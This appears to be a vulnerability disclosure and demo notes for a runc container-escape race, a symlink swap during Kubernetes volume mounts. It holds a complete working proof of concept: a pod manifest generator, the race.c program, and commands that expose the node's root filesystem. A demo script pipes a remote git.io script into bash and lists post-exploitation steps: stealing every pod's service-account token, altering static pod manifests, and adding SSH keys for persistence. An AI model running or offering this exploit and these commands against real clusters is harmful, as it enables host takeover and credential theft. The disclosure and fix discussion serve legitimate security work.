          "/proc/sched_debug",
          "/proc/scsi",
          "/sys/firmware"
        ],
        "readonlyPaths": [
          "/proc/asound",
          "/proc/bus",
          "/proc/fs",
          "/proc/irq",
          "/proc/sys",
          "/proc/sysrq-trigger"
        ]
      }
    }
  }
}

Inspect a non-exploited container

# crictl inspect addfd289b2769 
{
  "status": {
    "id": "addfd289b276936bb59fd81bedd5693d9bb5f486f19574cd392f621e9d2d5060",
    "metadata": {
      "attempt": 0,
      "name": "1-exploit"
    },
    "state": "CONTAINER_RUNNING",
    "createdAt": "2021-05-21T00:52:20.4450061Z",
    "startedAt": "2021-05-21T00:52:20.6401701Z",
    "finishedAt": "1970-01-01T00:00:00Z",
    "exitCode": 0,
    "image": {
      "annotations": {},
      "image": "docker.io/library/nginx:latest"
    },
    "imageRef": "docker.io/library/nginx@sha256:df13abe416e37eb3db4722840dd479b00ba193ac6606e7902331dcea50f4f1f2",
    "reason": "",
    "message": "",
    "labels": {
      "io.kubernetes.container.name": "1-exploit",
      "io.kubernetes.pod.name": "exploit",
      "io.kubernetes.pod.namespace": "default",
      "io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3"
    },
    "annotations": {
      "io.kubernetes.container.hash": "7a407414",
      "io.kubernetes.container.restartCount": "0",
      "io.kubernetes.container.terminationMessagePath": "/dev/termination-log",
      "io.kubernetes.container.terminationMessagePolicy": "File",
      "io.kubernetes.pod.terminationGracePeriod": "30"
    },
    "mounts": [
      {
        "containerPath": "/rootfs",
        "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume",
        "propagation": "PROPAGATION_PRIVATE",
        "readonly": false,
        "selinuxRelabel": false
      },
      {
        "containerPath": "/rootfs/host",
        "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume",
        "propagation": "PROPAGATION_PRIVATE",
        "readonly": false,
        "selinuxRelabel": false
      },
      {
        "containerPath": "/var/run/secrets/kubernetes.io/serviceaccount",
        "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj",
        "propagation": "PROPAGATION_PRIVATE",
        "readonly": true,
        "selinuxRelabel": false
      },
      {
        "containerPath": "/etc/hosts",
        "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts",
        "propagation": "PROPAGATION_PRIVATE",
        "readonly": false,
        "selinuxRelabel": false
      },
      {
        "containerPath": "/dev/termination-log",
        "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/1-exploit/c562dfbf",
        "propagation": "PROPAGATION_PRIVATE",
        "readonly": false,
        "selinuxRelabel": false
      }
    ],
    "logPath": "/var/log/pods/default_exploit_72c63ff5-05fd-465d-81c0-8bcfdd58edb3/1-exploit/0.log"
  },
  "info": {
    "sandboxID": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8",
    "pid": 2893952,
    "removing": false,
    "snapshotKey": "addfd289b276936bb59fd81bedd5693d9bb5f486f19574cd392f621e9d2d5060",
    "snapshotter": "overlayfs",
    "runtimeType": "io.containerd.runc.v2",
    "runtimeOptions": null,
    "config": {
      "metadata": {
        "name": "1-exploit"
      },
      "image": {
        "image": "sha256:f0b8a9a541369db503ff3b9d4fa6de561b300f7363920c2bff4577c6c24c5cf6"
      },
      "command": [
        "sleep",
        "infinity"
      ],
      "envs": [
        {
          "key": "KUBERNETES_PORT_443_TCP_ADDR",
          "value": "10.96.0.1"
        },
        {
          "key": "KUBERNETES_SERVICE_HOST",
          "value": "10.96.0.1"
        },
        {
          "key": "KUBERNETES_SERVICE_PORT",
          "value": "443"
        },
        {
          "key": "KUBERNETES_SERVICE_PORT_HTTPS",
          "value": "443"
        },
        {
          "key": "KUBERNETES_PORT",
          "value": "tcp://10.96.0.1:443"
        },
        {
          "key": "KUBERNETES_PORT_443_TCP",
          "value": "tcp://10.96.0.1:443"
        },
        {
          "key": "KUBERNETES_PORT_443_TCP_PROTO",
          "value": "tcp"
        },
        {
          "key": "KUBERNETES_PORT_443_TCP_PORT",
          "value": "443"
        }
      ],
      "mounts": [
        {
          "container_path": "/rootfs",
          "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume"
        },
        {
          "container_path": "/rootfs/host",
          "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume"
        },
        {
          "container_path": "/var/run/secrets/kubernetes.io/serviceaccount",
          "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj",
          "readonly": true
        },
        {
          "container_path": "/etc/hosts",
          "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts"
        },
        {
          "container_path": "/dev/termination-log",
          "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/1-exploit/c562dfbf"
        }
      ],
      "labels": {
        "io.kubernetes.container.name": "1-exploit",
        "io.kubernetes.pod.name": "exploit",
        "io.kubernetes.pod.namespace": "default",
        "io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3"
      },
      "annotations": {
        "io.kubernetes.container.hash": "7a407414",
        "io.kubernetes.container.restartCount": "0",
        "io.kubernetes.container.terminationMessagePath": "/dev/termination-log",
        "io.kubernetes.container.terminationMessagePolicy": "File",
        "io.kubernetes.pod.terminationGracePeriod": "30"
      },
      "log_path": "1-exploit/0.log",
      "linux": {
        "resources": {
          "cpu_period": 100000,
          "cpu_shares": 2,
          "oom_score_adj": 1000,
          "hugepage_limits": [
            {
              "page_size": "1GB"
            },
            {
              "page_size": "2MB"
            }
          ]
        },
        "security_context": {
          "namespace_options": {
            "pid": 1
          },
          "run_as_user": {},
          "masked_paths": [
            "/proc/acpi",
            "/proc/kcore",
            "/proc/keys",
            "/proc/latency_stats",
            "/proc/timer_list",
            "/proc/timer_stats",
            "/proc/sched_debug",
            "/proc/scsi",
            "/sys/firmware"
          ],
          "readonly_paths": [
            "/proc/asound",
            "/proc/bus",
            "/proc/fs",
            "/proc/irq",
            "/proc/sys",
            "/proc/sysrq-trigger"
          ]
        }
      }
    },
    "runtimeSpec": {
      "ociVersion": "1.0.2-dev",
      "process": {
        "user": {
          "uid": 0,
          "gid": 0
        },
        "args": [
          "sleep",
          "infinity"
        ],
        "env": [
          "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
          "HOSTNAME=exploit",
          "NGINX_VERSION=1.19.10",
          "NJS_VERSION=0.5.3",
          "PKG_RELEASE=1~buster",
          "KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1",
          "KUBERNETES_SERVICE_HOST=10.96.0.1",
          "KUBERNETES_SERVICE_PORT=443",
          "KUBERNETES_SERVICE_PORT_HTTPS=443",
          "KUBERNETES_PORT=tcp://10.96.0.1:443",
          "KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443",
          "KUBERNETES_PORT_443_TCP_PROTO=tcp",
          "KUBERNETES_PORT_443_TCP_PORT=443"
        ],
        "cwd": "/",
        "capabilities": {
          "bounding": [
            "CAP_CHOWN",
            "CAP_DAC_OVERRIDE",
            "CAP_FSETID",
            "CAP_FOWNER",
            "CAP_MKNOD",
            "CAP_NET_RAW",
            "CAP_SETGID",
            "CAP_SETUID",
            "CAP_SETFCAP",
            "CAP_SETPCAP",
            "CAP_NET_BIND_SERVICE",
            "CAP_SYS_CHROOT",
            "CAP_KILL",
            "CAP_AUDIT_WRITE"
          ],
          "effective": [
            "CAP_CHOWN",
            "CAP_DAC_OVERRIDE",
            "CAP_FSETID",
            "CAP_FOWNER",
            "CAP_MKNOD",
            "CAP_NET_RAW",
            "CAP_SETGID",
            "CAP_SETUID",
            "CAP_SETFCAP",
            "CAP_SETPCAP",
            "CAP_NET_BIND_SERVICE",
            "CAP_SYS_CHROOT",
            "CAP_KILL",
            "CAP_AUDIT_WRITE"
          ],
          "inheritable": [
            "CAP_CHOWN",
            "CAP_DAC_OVERRIDE",
            "CAP_FSETID",
            "CAP_FOWNER",
            "CAP_MKNOD",
            "CAP_NET_RAW",
            "CAP_SETGID",
            "CAP_SETUID",
            "CAP_SETFCAP",
            "CAP_SETPCAP",
            "CAP_NET_BIND_SERVICE",
            "CAP_SYS_CHROOT",
            "CAP_KILL",
            "CAP_AUDIT_WRITE"
          ],
          "permitted": [
            "CAP_CHOWN",
            "CAP_DAC_OVERRIDE",
            "CAP_FSETID",
            "CAP_FOWNER",
            "CAP_MKNOD",
            "CAP_NET_RAW",
            "CAP_SETGID",
            "CAP_SETUID",
            "CAP_SETFCAP",
            "CAP_SETPCAP",
            "CAP_NET_BIND_SERVICE",
            "CAP_SYS_CHROOT",
            "CAP_KILL",
            "CAP_AUDIT_WRITE"
          ]
        },
        "oomScoreAdj": 1000
      },
      "root": {
        "path": "rootfs"
      },
      "mounts": [
        {
          "destination": "/proc",
          "type": "proc",
          "source": "proc",
          "options": [
            "nosuid",
            "noexec",
            "nodev"
          ]
        },
        {
          "destination": "/dev",
          "type": "tmpfs",
          "source": "tmpfs",
          "options": [
            "nosuid",
            "strictatime",
            "mode=755",
            "size=65536k"
          ]
        },
        {
          "destination": "/dev/pts",
          "type": "devpts",
          "source": "devpts",
          "options": [
            "nosuid",
            "noexec",
            "newinstance",
            "ptmxmode=0666",
            "mode=0620",
            "gid=5"
          ]
        },
        {
          "destination": "/dev/mqueue",
          "type": "mqueue",
          "source": "mqueue",
          "options": [
            "nosuid",
            "noexec",
            "nodev"
          ]
        },
        {
          "destination": "/sys",
          "type": "sysfs",
          "source": "sysfs",
          "options": [
            "nosuid",
            "noexec",
            "nodev",
            "ro"
          ]
        },
        {
          "destination": "/sys/fs/cgroup",
          "type": "cgroup",
          "source": "cgroup",
          "options": [
            "nosuid",
            "noexec",
            "nodev",
            "relatime",
            "ro"
          ]
        },
        {
          "destination": "/rootfs",
          "type": "bind",
          "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/rootfs/host",
          "type": "bind",
          "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/etc/hosts",
          "type": "bind",
          "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/dev/termination-log",
          "type": "bind",
          "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/1-exploit/c562dfbf",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/etc/hostname",
          "type": "bind",
          "source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/hostname",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/etc/resolv.conf",
          "type": "bind",
          "source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/resolv.conf",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/dev/shm",
          "type": "bind",
          "source": "/run/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/shm",
          "options": [
            "rbind",
            "rprivate",
            "rw"
          ]
        },
        {
          "destination": "/var/run/secrets/kubernetes.io/serviceaccount",
          "type": "bind",
          "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj",
          "options": [
            "rbind",
            "rprivate",
            "ro"
          ]
        }
      ],
      "annotations": {
        "io.kubernetes.cri.container-name": "1-exploit",
        "io.kubernetes.cri.container-type": "container",
        "io.kubernetes.cri.sandbox-id": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8"
      },
      "linux": {
        "resources": {
          "devices": [
            {
              "allow": false,
              "access": "rwm"
            }
          ],
          "memory": {},
          "cpu": {
            "shares": 2,
            "period": 100000
          }
        },
        "cgroupsPath": "/kubelet/kubepods/besteffort/pod72c63ff5-05fd-465d-81c0-8bcfdd58edb3/addfd289b276936bb59fd81bedd5693d9bb5f486f19574cd392f621e9d2d5060",
        "namespaces": [
          {
            "type": "pid"
          },
          {
            "type": "ipc",
            "path": "/proc/2893298/ns/ipc"
          },
          {
            "type": "uts",
            "path": "/proc/2893298/ns/uts"
          },
          {
            "type": "mount"
          },
          {
            "type": "network",
            "path": "/proc/2893298/ns/net"
          }
        ],
        "maskedPaths": [
          "/proc/acpi",
          "/proc/kcore",
          "/proc/keys",
          "/proc/latency_stats",
          "/proc/timer_list",
          "/proc/timer_stats",
          "/proc/sched_debug",
          "/proc/scsi",
          "/sys/firmware"
        ],
        "readonlyPaths": [
          "/proc/asound",
          "/proc/bus",
          "/proc/fs",
          "/proc/irq",
          "/proc/sys",
          "/proc/sysrq-trigger"
        ]
      }
    }
  }
}


D: I've pushed an image with runc rc95 baked in; it has k8s 1.20.7, containerd 1.5.2, and runc rc95. You can use it like:

kind create cluster --image=mauilion/node:runc95

Testing Matrix:

  - Platform version (whatever makes sense for the platform)
  - containerd version
  - runc version (rc94 and below is likely vulnerable)
| Platform | Version | K8s | Containerd | Runc | Success |
| --- | --- | --- | --- | --- | --- |
| Kind | 0.10.0 | 1.20.2 | 1.4.0 | 1.0.0-rc92 | Yes |
| Kind | 0.11.0 | 1.21.1 | 1.5.1 | 1.0.0-rc94 | Yes |
| Kind | 0.11.0 | 1.20.7 | 1.5.2 | 1.0.0-rc95 | No |
| Kind | 0.10.0 | 1.20.2 | 1.4.0 | 1.0.0-rc95+dev* | No |
| Kubeadm | 1.21.1 | 1.21.1 | 1.4.4 | 1.0.0-rc93 | Yes |
| GKE regular | 1.19.9-gke.1400 | 1.19.9 | 1.4.3 | 1.0.0-rc10 | Yes |
| GKE alpha | 1.20.6-gke.1000 | 1.20.6 | 1.4.3 | 1.0.0-rc92 | Yes |
| EKS | 1.19.8-eks-96780e | 1.19.8 | 1.4.1 | 1.0.0-rc92 | Yes** |
| AKS regular | | 1.19.9 | 1.4.4+azure | 1.0.0-rc92 | Yes |
| Civo | latest | v1.20.0-k3s1 | 1.4.3-k3s1 | 1.0.0-rc92 | Yes |
| RKE1 | 1.2.8 | 1.20.6 | 1.4.4 | 1.0.0-rc93 | Yes |

* Compiled runc by hand from HEAD on 5/23
** Custom AMI: ami-01ac4896bf23dcbf7 us-east-2 (amazon-eks-node-1.19-v20210512) and earlier


Etienne's original report

Hello runc maintainers,

When mounting a volume, runc trusts the source, and will follow
symlinks, but it doesn't trust the target argument and will use
'filepath-securejoin' library to resolve any symlink and ensure the
resolved target stays inside the container root.
As explained in SecureJoinVFS documentation
(https://github.com/cyphar/filepath-securejoin/blob/40f9fc27fba074f2e2eebb3f74456b4c4939f4da/join.go#L57),
using this function is only safe if you know that the checked file is
not going to be replaced by a symlink, the problem is that we can
replace it by a symlink.
In K8S there is a trivial way to control the target: create a pod with
multiple containers sharing some volumes, one with a correct image,
and the others with non-existent images so they don't start right
away.

Let's start with the POC first and the explanations after

Create our attack POD

kubectl create -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: attack
spec:
  terminationGracePeriodSeconds: 1
  containers:
  - name: c1
    image: ubuntu:latest
    command: [ "/bin/sleep", "inf" ]
    env:
    - name: MY_POD_UID
      valueFrom:
        fieldRef:
          fieldPath: metadata.uid
    volumeMounts:
    - name: test1
      mountPath: /test1
    - name: test2
      mountPath: /test2
$(for c in {2..20}; do
cat <<EOC
  - name: c$c
    image: donotexists.com/do/not:exist
    command: [ "/bin/sleep", "inf" ]
    volumeMounts:
    - name: test1
      mountPath: /test1
$(for m in {1..4}; do
cat <<EOM
    - name: test2
      mountPath: /test1/mnt$m
EOM
done
)
    - name: test2
      mountPath: /test1/zzz
EOC
done
)
  volumes:
  - name: test1
    emptyDir:
      medium: "Memory"
  - name: test2
    emptyDir:
      medium: "Memory"
EOF

Compile race.c (see attachment), a simple binary running renameat2(dir, symlink, RENAME_EXCHANGE):

gcc race.c -O3 -o race

Wait for the container c1 to start, upload the 'race' binary to it, and exec bash:

sleep 30 # wait for the first container to start
kubectl cp race -c c1 attack:/test1/
kubectl exec -ti pod/attack -c c1 bash

you now have a shell in container c1

Create the following symlink (explanations later)

ln -s / /test2/test2

Launch 'race' multiple times to try to exploit this TOCTOU

cd test1
seq 1 4 | xargs -n1 -P4 -I{} ./race mnt{} mnt-tmp{} /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/

Now that everything is ready, in a second shell, update the images so that the other containers can start:

for c in {2..20}; do
kubectl set image pod attack c$c=ubuntu:latest
done

Wait a bit and look at the results

for c in {2..20}; do
echo "~~ Container c$c ~~"; kubectl exec -ti pod/attack -c c$c ls /test1/zzz
done

~~ Container c2 ~~
test2
~~ Container c3 ~~
test2
~~ Container c4 ~~
test2
~~ Container c5 ~~
bin dev home lib64 mnt postinst root sbin tmp var
boot etc lib lost+found opt proc run sys usr
~~ Container c6 ~~
bin dev home lib64 mnt postinst root sbin tmp var
boot etc lib lost+found opt proc run sys usr
~~ Container c7 ~~
error: unable to upgrade connection: container not found ("c7")
~~ Container c8 ~~
test2
~~ Container c9 ~~
bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
~~ Container c10 ~~
test2
~~ Container c11 ~~
bin dev home lib64 mnt postinst root sbin tmp var
boot etc lib lost+found opt proc run sys usr
~~ Container c12 ~~
test2
~~ Container c13 ~~
test2
~~ Container c14 ~~
test2
~~ Container c15 ~~
bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
~~ Container c16 ~~
error: unable to upgrade connection: container not found ("c16")
~~ Container c17 ~~
error: unable to upgrade connection: container not found ("c17")
~~ Container c18 ~~
bin boot dev etc home lib lib64 lost+found mnt opt postinst proc root run sbin sys tmp usr var
~~ Container c19 ~~
error: unable to upgrade connection: container not found ("c19")
~~ Container c20 ~~
test2

On my first try I had 6 containers where /test1/zzz was / on the node,
some failed to start, and the remaining were not affected.

Even without the ability to update images, we could use a fast
registry for c1 and a slow registry or big container for c2+, we just
need c1 to start 1sec before the others.

Tests were done on the following GKE cluster:

gcloud beta container --project "delta-array-282919" clusters create "toctou" --zone "us-central1-c" --no-enable-basic-auth --cluster-version "1.18.12-gke.1200" --release-channel "rapid" --machine-type "e2-medium" --image-type "COS_CONTAINERD" --disk-type "pd-standard" --disk-size "100" --metadata disable-legacy-endpoints=true --scopes "https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" --num-nodes "3" --enable-stackdriver-kubernetes --enable-ip-alias --network "projects/delta-array-282919/global/networks/default" --subnetwork "projects/delta-array-282919/regions/us-central1/subnetworks/default" --default-max-pods-per-node "110" --no-enable-master-authorized-networks --addons HorizontalPodAutoscaling,HttpLoadBalancing --enable-autoupgrade --enable-autorepair --max-surge-upgrade 1 --max-unavailable-upgrade 0 --enable-shielded-nodes

K8S 1.18.12, containerd 1.4.1, runc 1.0.0-rc10, 2 vCPUs

I haven't dug too deep into the code and relied on strace to understand
what was happening, and I did the investigation maybe a month ago so
details are fuzzy, but here is my understanding:

  1. K8S prepares all the volumes for the pod in
     /var/lib/kubelet/pods/$MY_POD_UID/volumes/VOLUME-TYPE/VOLUME-NAME
     (the fact that the paths are known definitely helps this attack)
  2. containerd prepares the rootfs at
     /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs
  3. runc calls unshare(CLONE_NEWNS), preventing the following mount
     operations from affecting other containers or the node directly
  4. runc bind-mounts the K8S volumes:
     4.1) runc calls securejoin.SecureJoin to resolve the destination/target
     4.2) runc calls mount()

K8S doesn't give us control over the mount source, but we have full
control over the target of the mounts, so the trick is to mount a
directory containing a symlink over the K8S volumes path so that the
next mount uses this new source, giving us access to the node root
filesystem.

From the node, the filesystem looks like this:

/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt1
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp1 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt2 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp2

/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2/test2 -> /

Our 'race' binary is constantly swapping mntX and mnt-tmpX. When c2+
start, they do the following mounts:
mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mntX)
If we are lucky, mntX is a directory when we call SecureJoin and a
symlink when we call mount, and as mount follows symlinks, this
gives us
mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/)

The filesystem now looks like this:

/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt1/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp1 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt2 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp2/

/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2 -> /

When we do the final mount
mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/zzz)
becomes
mount(/, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mntX)

And we now have full access to the whole node root, including /dev,
/proc, all the tmpfs and overlay of other containers, everything :)
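
Condensed into code, the race is the gap between the SecureJoin resolution and the mount(2) call that uses its result. A simplified sketch of the vulnerable (pre-rc95) pattern, for illustration only (the real runc code path is more involved):

package main

import (
	securejoin "github.com/cyphar/filepath-securejoin"
	"golang.org/x/sys/unix"
)

// bindMountVulnerable shows the pre-rc95 shape of the code path in
// simplified form: resolve the destination, then mount by path string.
func bindMountVulnerable(rootfs, source, destination string) error {
	// Resolve the attacker-chosen destination relative to the container
	// rootfs *at this instant*; the result is a plain string path.
	dest, err := securejoin.SecureJoin(rootfs, destination)
	if err != nil {
		return err
	}
	// TOCTOU window: a process sharing the volume can now swap a component
	// of dest for a symlink (renameat2 with RENAME_EXCHANGE). mount(2)
	// re-resolves the string and follows that symlink, so the bind mount
	// can land outside rootfs -- e.g. on the kubelet volumes directory.
	return unix.Mount(source, dest, "", unix.MS_BIND, "")
}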

A possible fix is to replace secureJoin with the same approach as used
to fix K8S subpath vulnerability:
https://kubernetes.io/blog/2018/04/04/fixing-subpath-volume-vulnerability/#the-solution
openat() files one by one with symlink resolution disabled, manually
follow symlinks, check that we are still in the container root at the
end, and then bind-mount /proc/<runc pid>/fd/<final fd>

If I understand correctly, crun either uses openat2() or some manual
resolution (such as secureJoin) followed by a check of
openat(/proc/self/fd/) so I think they are safe.
Haven't checked any other runtime.
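
For reference, on new enough kernels (Linux 5.6+) openat2() with RESOLVE_IN_ROOT lets the kernel do the containment check atomically; a minimal sketch via golang.org/x/sys/unix (illustrative, not crun's or runc's actual code):

package main

import (
	"fmt"

	"golang.org/x/sys/unix"
)

// openInRoot opens path as if rootfd were "/": the kernel confines all
// symlink and ".." resolution to that root, so there is no separate
// "check then use" step for userspace to race against.
func openInRoot(rootfd int, path string) (int, error) {
	how := unix.OpenHow{
		Flags:   unix.O_PATH | unix.O_CLOEXEC,
		Resolve: unix.RESOLVE_IN_ROOT, // ".." and symlinks cannot escape rootfd
	}
	fd, err := unix.Openat2(rootfd, path, &how)
	if err != nil {
		return -1, fmt.Errorf("openat2 %q: %w", path, err)
	}
	return fd, nil
}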

race.c

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/syscall.h>

int main(int argc, char *argv[]) {
    if (argc != 4) {
        fprintf(stderr, "Usage: %s name1 name2 linkdest\n", argv[0]);
        exit(EXIT_FAILURE);
    }
    char *name1 = argv[1];
    char *name2 = argv[2];
    char *linkdest = argv[3];

    int dirfd = open(".", O_DIRECTORY|O_CLOEXEC);
    if (dirfd < 0) {
        perror("Error open CWD");
        exit(EXIT_FAILURE);
    }

    if (mkdir(name1, 0755) < 0) {
        perror("mkdir failed");
        //do not exit
    }
    if (symlink(linkdest, name2) < 0) {
        perror("symlink failed");
        //do not exit
    }

    while (1)
    {
        renameat2(dirfd, name1, dirfd, name2, RENAME_EXCHANGE);
    }
}

DEMO SCRIPT

#!/usr/bin/env bash

# honk.sh
# 0. Set up a minikube with runC less than rc94
# 1. Run the real thing and get it to "win"
# 2. Modify BASEHASH, WINHASH, and WINHONK accordingly
# 3. Run ./honk.sh

BASEHASH="honk-68b95d5858"
# The pod that won
WINHASH="$BASEHASH-8k6tr"
# The number of the n-honk container that won
WINHONK="5" # "n" corresponds to "n-honk"
TRYSLEEP="1.6"

########################
# include the magic
########################
. lib/demo-magic.sh
TYPE_SPEED=23

clear
echo ""

p "# We have RBAC access to create daemonsets, deployments, and\n pods in the default namespace of a 1.20.2 cluster:"
kubectx minikube 2> /dev/null 1> /dev/null

pe "kubectl version --short=true | grep Server" 

pe "kubectl get nodes"

p "kubectl get pods --all-namespaces"
kubectl get pods --all-namespaces | grep -v " honk-"

p "# The worker nodes are running a vulnerable version of runC"
p "runc --version"
docker exec -it minikube runc --version

clear
p "# Unleash the honks 🦢🦢🦢🦢!!!!"
p "curl -L http://git.io/honk-symlink.sh | REPLICAS=10 bash"

echo "staging the nginx:stable image with a daemonset"
sleep 1.4
echo "daemonset.apps/honk-stage created"
sleep 0.7
echo "waiting for the image staging"
sleep 1.5
echo "Succeeded"
sleep 0.3
echo "Deploying the honk deployment."
sleep 0.5
echo "deployment.apps/honk created"
sleep 0.2
echo "Waiting for things to deploy for 5 seconds before starting"
sleep 5.2

ATTEMPTS=1
while [ $ATTEMPTS -le 10 ]; do 
  for POD in 592sn 5cbj5 8l8z6 98h9c 9hlgw jjmqb ngslb nmqqg pbf2t a1312; do
    echo  "attempt $ATTEMPTS"
    COUNTER=1
    while [ $COUNTER -le 5 ]; do
      sleep 0.2
      echo -n "Checking pod/$BASEHASH-$POD $COUNTER-honk for the host mount..."
      sleep $TRYSLEEP
      echo "nope."
      let COUNTER=$COUNTER+1
      sleep 0.1
    done
    echo "pod/$BASEHASH-$POD force deleted"
    let ATTEMPTS=$ATTEMPTS+1
  done
done

echo "attempt 11"
COUNTER=1
while [ $COUNTER -le 5 ]; do
  sleep 0.3
  echo -n "Checking pod/$WINHASH $COUNTER-honk for the host mount..."
  sleep $TRYSLEEP
  if [ $COUNTER -eq $WINHONK ]; then
    echo "SUCCESS after 11 attempts! Run:"
    echo "kubectl exec -it $WINHASH -c $WINHONK-honk -- bash"
    exit 0
  else
    echo "nope."
  fi
  let COUNTER=$COUNTER+1
done

exit

######

## Demo commands
hostname    # container's
ip a        # container's
ps -ef      # host's
kill        # but can't kill

# Steal all mounted secrets in pods running on this node

find /var/lib/kubelet/pods/*/volumes/kubernetes.io~secret/*/token -print -exec cat {} \;

# Modify/add static pod manifest to get kubelet to run anything you want

ls /etc/kubernetes/manifests/

# Add an SSH key for persistence

mkdir -p /root/.ssh
